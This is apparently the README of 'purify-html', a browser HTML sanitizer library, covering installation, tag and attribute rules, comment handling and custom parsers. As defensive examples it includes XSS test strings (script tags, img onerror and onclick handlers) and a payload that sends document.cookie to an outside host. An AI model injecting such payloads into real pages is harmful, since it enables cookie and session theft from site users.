
purify-html
A minimalist client library for cleaning up strings so they can be safely used as HTML.
Do simple things simply: zero configuration to completely strip a string of HTML, with the ability to incrementally customize as needed.
The basic idea is to use the browser API to parse and modify the DOM. As a result, parsing with DOMParser is more reliable and faster, and it does not require precious kilobytes of space in the build.
npm
npm install purify-html
yarn
yarn add purify-html
CDN
<script src="https://cdn.jsdelivr.net/npm/purify-html/dist/index.es.js"></script>
<!-- or -->
<script type="module">
import PurifyHTML from 'https://cdn.jsdelivr.net/npm/purify-html/+esm';
</script>
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML(options);
setParser({
parse(str: string): Element
stringify(elem: Element): string
}): void
See here for details.
object
sanitize(string): string
Performs string cleanup according to the rules passed in options.
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML(options);
const untrustedString = '...';
console.log(sanitizer.sanitize(untrustedString));
toHTMLEntities(string): string
Converts a string to HTML entities. This is similar to escaping, but for the HTML interpreter: in HTML, the resulting characters are rendered "as is". See more here.
const str = '<br />';
// => an entity-encoded string that is displayed on the page as '<br />'
console.log(sanitizer.toHTMLEntities(str));
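As a rough illustration of what converting to HTML entities means, here is a minimal sketch. The helper name escapeToEntities and the choice of numeric character references are assumptions made for this example; the exact output format of toHTMLEntities is not specified here, and the library's implementation may differ.

```typescript
// Hypothetical helper, NOT the library's implementation.
// Replaces the characters that are significant to an HTML parser with
// decimal numeric character references, so the browser renders them as text.
function escapeToEntities(input: string): string {
  return input.replace(/[&<>"'\/]/g, (ch) => `&#${ch.charCodeAt(0)};`);
}

console.log(escapeToEntities('<br />')); // &#60;br &#47;&#62;
```

When the result is inserted into a page, the browser displays the literal text <br /> instead of creating a line break element.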
Array<string | TagRule>
An array with rules for the sanitizer.
// Deprecated!
type AttributeRulePresetName =
| '%correct-link%'
| '%http-link%'
| '%https-link%'
| '%ftp-link%'
| '%https-link-without-search-params%'
| '%http-link-without-search-params%'
| '%same-origin%';
interface AttributeRule {
// attribute name
name: string;
// rules for attribute value
value?:
| string
| string[]
| RegExp
| { preset: AttributeRulePresetName } // Deprecated!
| ((attributeValue: string) => boolean);
};
interface TagRule {
// tagname
name: string;
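// rules for attributes (optional); the examples in this document pass
// both plain attribute names and AttributeRule objects
attributes?: Array<string | AttributeRule>;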
// Don't remove comments that are direct children of THIS node.
// Comments inside child nodes are still removed (see the example).
dontRemoveComments?: boolean;
/*
Example:
Config
[
{ name: 'div', dontRemoveComments: true },
'span'
]
Input:
<div>
<!-- comment 0 -->
<span> <!-- comment 1 --> </span>
</div>
Output:
<div>
<!-- comment 0 -->
<span> </span>
</div>
*/
};
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML([
'hr',
{ name: 'br' },
{ name: 'img', attributes: [{ name: 'src' }] },
{
name: 'a',
attributes: [
{ name: 'target', value: ['_blank', '_self', '_parent', '_top'] },
{ name: 'href', value: /^https?:\/\// },
],
},
]);
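To make the value rules more concrete, the sketch below shows one way the different kinds of value (string, array of strings, RegExp, function) could be checked against an attribute value. The helper valueMatches and its semantics (exact equality for strings, membership for arrays, any value accepted when no rule is given) are assumptions for illustration; the library's actual matching logic may differ, and deprecated presets are left out.

```typescript
type AttributeValueRule =
  | string
  | string[]
  | RegExp
  | ((attributeValue: string) => boolean);

// Hypothetical helper, NOT part of purify-html.
function valueMatches(rule: AttributeValueRule | undefined, value: string): boolean {
  if (rule === undefined) return true; // assumption: no value rule accepts any value
  if (typeof rule === 'string') return rule === value; // exact match
  if (Array.isArray(rule)) return rule.indexOf(value) !== -1; // one of the listed values
  if (rule instanceof RegExp) return rule.test(value); // pattern match
  return rule(value); // custom predicate
}

console.log(valueMatches(/^https?:\/\//, 'https://example.com')); // true
console.log(valueMatches(['_blank', '_self'], '_top')); // false
console.log(valueMatches((v) => v.startsWith('awesome-'), 'awesome-id')); // true
```

Note that a RegExp with the g or y flag keeps state between test calls, so such flags are best avoided in rules.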
NOTE When you use regular expressions to check untrusted strings, remember to check those regular expressions for ReDoS vulnerabilities.
A successful ReDoS exploit makes the program hang while it evaluates a regular expression against a specially crafted string.
See more: https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
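One possible mitigation, sketched below, is to wrap the pattern in a function rule that rejects over-long values before the regular expression runs, and to keep the pattern itself free of nested quantifiers. The helper boundedPattern, the pattern, and the length limit are hypothetical and chosen only for this example; a length cap limits the damage of a bad pattern but does not replace reviewing the pattern.

```typescript
// Hypothetical helper, NOT part of purify-html.
// Returns a function rule that checks the length first and only then
// evaluates the pattern.
function boundedPattern(pattern: RegExp, maxLength: number): (value: string) => boolean {
  return (value) => value.length <= maxLength && pattern.test(value);
}

// A simple pattern without nested quantifiers, capped at 16 characters.
const idRule = boundedPattern(/^awesome-[a-z0-9-]+$/, 16);

console.log(idRule('awesome-em-id')); // true
console.log(idRule('awesome-very-long-identifier')); // false: longer than 16 characters
```

The resulting function can be used wherever an attribute rule accepts a function as its value, for example { name: 'id', value: idRule }.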
via bundler:
import PurifyHTML from 'purify-html';
const allowedTags = [
// only string
'hr',
// as object
{ name: 'br' },
// attributes check
{ name: 'b', attributes: ['class'] },
// advanced attributes check
{ name: 'p', attributes: [{ name: 'class' }] },
// check attributes values (string)
{ name: 'strong', attributes: [{ name: 'id', value: 'awesome-strong-id' }] },
// check attributes values (RegExp)
{ name: 'em', attributes: [{ name: 'id', value: /awesome-em-id?s/ }] },
// check attributes values (array of strings)
{
name: 'em',
attributes: [
{ name: 'id', value: ['awesome-strong-id', 'other-awesome-strong-id'] },
],
},
// check attribute value (function)
{
name: 'em',
attributes: [{ name: 'id', value: value => value.startsWith('awesome-') }],
},
// use attributes checks preset (Deprecated)
{
name: 'a',
attributes: [{ name: 'href', value: { preset: '%https-link%' } }], // presets are deprecated
},
];
const sanitizer = new PurifyHTML(allowedTags);
const dangerString = `
<script> fetch('google.com', { mode: 'no-cors' }) </script>
<<div></div>img src="1" onerror="alert(1)">
<img src="1" onerror="alert(1)">
<b>Bold</b>
<b class="red">Bold</b>
<b class="red" onclick="alert(1)">Bold</b>
<p data-some="123" data-some-else="321">123</p>
<div></div>
<hr>
`;
const safeString = sanitizer.sanitize(dangerString);
console.log(safeString);
/*
&lt;img src="1" onerror="alert(1)"&gt;
<b>Bold</b>
<b class="red">Bold</b>
<b class="red">Bold</b>
<p data-some="123">123</p>
<hr>
*/
<!-- ... -->
<head>
<!-- ... -->
<script src="https://unpkg.com/purify-html@latest/dist/index.es.js"></script>
</head>
<!-- ... -->
<script>
PurifyHTML.setParser(/* ... */);
const sanitizer = new PurifyHTML.sanitizer(/* ... */);
sanitizer.sanitize(/* ... */);
</script>
<!-- ... -->
Usage in the browser differs slightly from usage with bundlers. This is not ideal, but it was necessary to avoid polluting the global scope.
Consider, for example, the string <!-- <img src="x" onerror="alert(1)"> -->.
Technically, inserting it into the DOM does not lead to code execution, but it cannot be considered safe either. The result of the sanitize method is declared to conform to the rules specified when the sanitizer was initialized, and markup hidden inside a comment would slip past those rules.
NOTE
CDATA comments (or CDATA sections), although made for XML, are also supported in HTML. In purify-html they are treated as regular HTML comments.
See more about CDATA Section on MDN
Therefore, you can control where comments are kept and where they are removed.
By default, HTML comments are stripped. You can change this as follows:
import PurifyHTML from 'purify-html';
const sanitizer = new PurifyHTML(['#comments' /* ... */]);
sanitizer.sanitize(/* ... */);
If you want comments to be removed everywhere except for specific tags, then you can specify it like this:
import PurifyHTML from 'purify-html';
const rules = ['#comments', { name: 'div', dontRemoveComments: true }];
const sanitizer = new PurifyHTML(rules);
sanitizer.sanitize(/* ... */);
When used in an environment where the standard DOMParser is absent, you need to install a parser manually.
For example:
import { JSDOM } from 'jsdom';
global.DOMParser = new JSDOM().window.DOMParser;
import PurifyHTML from 'purify-html';
const sanitizer = new PurifyHTML(); // works
Or
import { JSDOM } from 'jsdom';
import PurifyHTML, { setParser } from 'purify-html';
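// Scope the elem variable and reuse a single parsed <body> element for performance
{
// Take DOMParser from jsdom, since this environment has no global DOMParser
const { DOMParser } = new JSDOM().window;
const elem: Element = new DOMParser()
.parseFromString('', 'text/html')
.body;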
// Set methods
setParser({
parse(string: string): Element {
elem.innerHTML = string;
return elem;
},
stringify(elem: Element): string {
return elem.innerHTML;
},
});
}
In some cases, you may want to use your own parser instead of DOMParser.
This can be done like this:
import PurifyHTML, { setParser } from 'purify-html';
setParser({
parse(HTMLString: string): HTMLElement {
// ...
},
stringify(element: HTMLElement): string {
// ...
},
});
const sanitizer = new PurifyHTML();
// ...
Note! The root element is passed to the stringify function, and the function is expected to return the CONTENT of that element, not the element itself.
const input = document.createElement('div');
input.innerHTML = '<span>span</span>';
stringify(input); // '<span>span</span>' => OK
stringify(input); // '<div><span>span</span></div>' => WRONG
Why not document.createElement(...)?
Consider processing the string like this:
const parse = str => {
const node = document.createElement('div');
node.innerHTML = str;
return node;
};
In fact, when this function receives a specially crafted payload, it will RUN it. The following payload sends a network request:
<img/src/onerror="fetch('www.site.com?q='+encodeURI(document.cookie))">
With DOMParser, the code does not run.
%correct-link% - only a correct link
%http-link% - only an http link
%https-link% - only an https link
%ftp-link% - only an ftp link
%https-link-without-search-params% - delete all search params and force the https protocol
%http-link-without-search-params% - delete all search params and force the http protocol
%same-https-origin% - only a link that leads to the same origin as the current self.location.origin; forces the https protocol
%same-http-origin% - only a link that leads to the same origin as the current self.location.origin; forces the http protocol

Although browser support is already over 97%, the specification for DOMParser is not yet fully established. More details.
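Because the presets are marked as deprecated and attribute values also accept a function, a preset such as %https-link% could be approximated with a small predicate. The sketch below is a hypothetical stand-in built on the standard URL constructor, not the library's own preset logic; the name isHttpsLink is an assumption for this example.

```typescript
// Hypothetical replacement for the deprecated '%https-link%' preset.
// Accepts only absolute URLs whose protocol is https.
function isHttpsLink(value: string): boolean {
  try {
    return new URL(value).protocol === 'https:';
  } catch {
    return false; // not a parsable absolute URL
  }
}

// The rule shape follows the function-valued attribute rules shown earlier.
const linkRule = {
  name: 'a',
  attributes: [{ name: 'href', value: isHttpsLink }],
};

console.log(isHttpsLink('https://example.com/page')); // true
console.log(isHttpsLink('javascript:alert(1)')); // false
```

Relative links such as /path are rejected by this predicate, because the URL constructor throws when it receives a relative URL without a base.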

If you find this project helpful, please give it a ⭐️ on GitHub to show your support. I would also appreciate it if you shared it with others who might find it useful!